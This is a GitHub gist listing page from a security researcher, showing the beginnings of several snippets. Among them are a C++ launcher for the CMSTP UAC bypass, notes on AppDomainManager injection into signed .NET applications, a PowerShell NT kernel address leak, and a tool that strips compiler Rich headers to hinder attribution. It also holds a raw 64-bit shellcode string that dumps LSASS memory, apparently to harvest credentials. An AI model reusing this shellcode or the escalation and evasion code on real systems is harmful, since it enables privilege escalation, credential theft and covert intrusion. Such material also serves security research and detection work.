Skip to content

Instantly share code, notes, and snippets.

View aaaddress1's full-sized avatar
🤗
buy me a beer plz 🍺

Sheng-Hao Ma aaaddress1

🤗
buy me a beer plz 🍺
View GitHub Profile
@aaaddress1
aaaddress1 / CMSTP_UACBypass_viaPowerShell.cpp
Created October 24, 2024 15:06
創建無敏感參數 PowerShell 進程並自動化逐行輸入 CMSTP UAC 提權指令完成提權
#include <windows.h>
#include <iostream>
// CMSTP UAC Bypass PowerShell Version.
// ref: https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1
auto cmstp_uacbypass_ps1 = "# UAC Bypass poc using SendKeys\n"
"# Version 1.0\n"
"# Author: Oddvar Moe\n"
"# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/\n"
"# Todo: Hide window on screen for stealth\n"
# GPT2 BPE-Tokenizer token 轉 utf-8 處理
# 轉換僅針對不在詞表內,以bytes形式表達的token(如中文字)
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("gpt2")
word = "台"
tokens = tokenizer.convert_ids_to_tokens(tokenizer(word,add_special_tokens=False)["input_ids"])
print("tokens:",tokens)
# 轉 utf-8
@aaaddress1
aaaddress1 / _notes.md
Created September 12, 2024 14:47 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

@aaaddress1
aaaddress1 / rename.c
Created May 7, 2024 03:22
Rename File on Disk using SetFileInformationByHandle | Win32 API
#define _UNICODE
#define UNICODE
#include <windows.h>
#ifdef __cplusplus
#include <cstdio>
#else
#include <stdio.h>
#endif
@aaaddress1
aaaddress1 / LeakNtKrnlAddr.ps1
Created September 26, 2023 03:16
Abuse EnumDeviceDrivers() to leak the location of Windows NT Kermel
Add-Type -TypeDefinition @"
// ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class EVD2
{
[DllImport("kernel32.dll")]
@aaaddress1
aaaddress1 / ExeMask.py
Last active September 28, 2024 14:15
Strip your personal compile info from Exe Files
import pefile, struct, sys
if len(sys.argv) != 2:
print(f"Strip your personal compile info from Exe Files by [email protected]")
print(f"Usage: {sys.argv[0]} [path/to/exe]")
sys.exit(-1)
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
def mask_myRichHdr(in_pefile):
DANS = 0x536E6144 # 'DanS' as dword
@aaaddress1
aaaddress1 / shellcode64.c
Last active May 3, 2024 22:10
Windows 64bit Shellcode
// sprintf(commandLine, L"%i C:\\Windows\\Temp\\DumpLsass.log full", GetCurrentProcessId); MiniDumpW(0, 0, commandLine);
char shellcode_selfDumpToTmp[] = "\xe9\x0c\x02\x00\x00\x90\x48\x89\xc8\x48\x8d\x49\x02\x66\x83\x38\x00\xb8\x00\x00\x00\x00\x74\x28\x0f\x1f\x84\x00\x00\x00\x00\x00\x44\x0f\xb7\x01\x48\x83\xc1\x02\x44\x89\xc2\x83\xca\x20\x0f\xb7\xd2\x01\xd0\xc1\xc8\x08\x66\x45\x85\xc0\x75\xe4\xc3\x0f\x1f\x00\xc3\x48\x89\xc8\x48\x8d\x49\x01\x80\x38\x00\xb8\x00\x00\x00\x00\x74\x26\x66\x0f\x1f\x44\x00\x00\x44\x0f\xb6\x01\x48\x83\xc1\x01\x44\x89\xc2\x83\xca\x20\x0f\xbe\xd2\x01\xd0\xc1\xc8\x08\x45\x84\xc0\x75\xe5\xc3\x0f\x1f\x40\x00\xc3\x65\x48\x8b\x04\x25\x60\x00\x00\x00\x48\x8b\x40\x18\x4c\x8b\x48\x20\x4c\x8d\x58\x20\x4d\x39\xcb\x74\x34\x48\x83\xec\x28\x41\x89\xca\xeb\x0c\x0f\x1f\x40\x00\x4d\x8b\x09\x4d\x39\xcb\x74\x18\x49\x8b\x49\x50\xe8\x55\xff\xff\xff\x44\x39\xd0\x75\xea\x49\x8b\x41\x20\x48\x83\xc4\x28\xc3\x90\x31\xc0\x48\x83\xc4\x28\xc3\x31\xc0\xc3\x57\x56\x53\x48\x83\xec\x20\x48\x63\x41\x3c\x8b\xb4\x01\x88\
@aaaddress1
aaaddress1 / rtVirusTotalScan.py
Last active February 1, 2023 05:29
Real-Time Parse VirusTotal's Cuckoo Reports for the specific Sample by Hash
# can search sample's hash on virustotal by the following query:
# >>> {RANSOMWARE_FAMILY} and sandbox_name:virustotal_cuckoofork and engines:ransom
import sys
import requests
if len(sys.argv) != 2:
print(f"usage: {sys.argv[0]} <sample-hash> by aaaddress1.\n")
sys.exit(-1)
url = 'https://www.virustotal.com/vtapi/v2/file/behaviour'
wget //github.com/LeonardLaszlo/nw.js-armv7-binaries/releases/download/nw60-arm64_2022-01-08/nw60-arm64_2022-01-08.tar.gz
tar xvf nw60-arm64_2022-01-08.tar.gz
tar xvf usr/docker/dist/nwjs-chromium-ffmpeg-branding/nwjs-symbol-v0.60.1-linux-arm64.tar.gz
cd nwjs-v0.60.1-linux-arm64/
export DISPLAY=:0.0
./nw --use-gl=egl --ignore-gpu-blacklist --disable-accelerated-2d-canvas --num-raster-threads=2
__int64 __fastcall LdrpInitialize(PCONTEXT threadCtx, IMAGE_DOS_HEADER *peImgToFix)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
currTeb = NtCurrentTeb();
while ( 1 )
{
loadStep = (unsigned int)_InterlockedCompareExchange(&LdrpProcessInitialized, 1, 0);
if ( (_DWORD)loadStep == 1 && (currTeb->SameTebFlags & 0x2000) == 0 )
goto done;